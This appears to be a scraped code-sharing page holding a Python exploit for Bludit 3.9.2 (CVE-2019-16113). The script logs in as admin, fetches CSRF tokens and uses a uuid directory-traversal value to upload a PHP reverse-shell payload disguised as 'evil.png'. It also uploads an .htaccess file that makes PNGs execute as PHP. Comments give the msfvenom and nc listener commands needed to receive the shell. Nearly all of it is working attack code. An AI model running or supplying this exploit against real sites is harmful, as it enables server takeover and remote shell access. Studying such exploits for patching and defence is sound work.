扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 |
# Title: Bludit 3.9.2 - Directory Traversal # Author: James Green # Date: 2020-07-20 # Vendor Homepage: https://www.bludit.com # Software Link: https://github.com/bludit/bludit # Version: 3.9.2 # Tested on: Linux Ubuntu 19.10 Eoan # CVE: CVE-2019-16113 # # Special Thanks to Ali Faraj (@InfoSecAli) and authors of MSF Module https://www.exploit-db.com/exploits/47699 #### USAGE #### # 1. Create payloads: .png with PHP payload and the .htaccess to treat .pngs like PHP # 2. Change hardcoded values: URL is your target webapp, username and password is admin creds to get to the admin dir # 3. Run the exploit # 4. Start a listener to match your payload: <code>nc -nlvp 53</code>, meterpreter multi handler, etc # 5. Visit your target web app and open the evil picture: visit url + /bl-content/tmp/temp/evil.png #!/usr/bin/env python3 import requests import re import argparse import random import string import base64 from requests.exceptions import Timeout url = 'http://127.0.0.1'# CHANGE ME username = 'James'# CHANGE ME password = 'Summer2020'# CHANGE ME # msfvenom -p php/reverse_php LHOST=127.0.0.1 LPORT=53 -f raw -b '"' > evil.png # echo -e "<?php $(cat evil.png)" > evil.png payload = 'evil.png'# CREATE ME # echo "RewriteEngine off" > .htaccess # echo "AddType application/x-httpd-php .png" >> .htaccess payload2 = '.htaccess'# CREATE ME def login(url,username,password): """ Log in with provided admin creds, grab the cookie once authenticated """ session = requests.Session() login_page = session.get(url + "/admin/") csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text ).group(1) cookie = ((login_page.headers["Set-Cookie"]).split(";")[0].split("=")[1]) data = {"save":"", "password":password, "tokenCSRF":csrf_token, "username":username} headers = {"Origin":url, "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Upgrade-Insecure-Requests":"1", "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0", "Connection":"close", "Referer": url + "/admin/", "Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding":"gzip, deflate", "Content-Type":"application/x-www-form-urlencoded" } cookies = {"BLUDIT-KEY":cookie} response = session.post(url + "/admin/", data=data, headers=headers, cookies=cookies, allow_redirects = False ) print("cookie: " + cookie) return cookie def get_csrf_token(url,cookie): """ Grab the CSRF token from an authed session """ session = requests.Session() headers = {"Origin":url, "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Upgrade-Insecure-Requests":"1", "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0", "Connection":"close", "Referer":url + "/admin/", "Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding":"gzip, deflate"} cookies = {"BLUDIT-KEY":cookie} response = session.get(url + "/admin/dashboard", headers=headers, cookies=cookies ) csrf_token = response.text.split('var tokenCSRF = "')[1].split('"')[0] print("csrf_token: " + csrf_token) return csrf_token def upload_evil_image(url, cookie, csrf_token, payload, override_uuid=False): """ Upload files required for to execute PHP from malicious image files. Payload and .htaccess """ session = requests.Session() files= {"images[]": (payload, open(payload, "rb"), "multipart/form-data", {"Content-Type": "image/png", "filename":payload} )} if override_uuid: data = {"uuid": "../../tmp/temp", "tokenCSRF":csrf_token} else: # On the vuln app, this line occurs first: # Filesystem::mv($_FILES['images']['tmp_name'][$uuid], PATH_TMP.$filename); # Even though there is a file extension check, it won't really stop us # from uploading the .htaccess file. data = {"tokenCSRF":csrf_token} headers = {"Origin":url, "Accept":"*/*", "X-Requested-With":"XMLHttpRequest", "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0", "Connection":"close", "Referer":url + "/admin/new-content", "Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding":"gzip, deflate", } cookies = {"BLUDIT-KEY":cookie} response = session.post(url + "/admin/ajax/upload-images", data=data, files=files, headers=headers, cookies=cookies) print("Uploading payload: " + payload) if __name__ == "__main__": cookie = login(url, username, password) token = get_csrf_token(url, cookie) upload_evil_image(url, cookie, token, payload, True) upload_evil_image(url, cookie, token, payload2) |
体验盒子
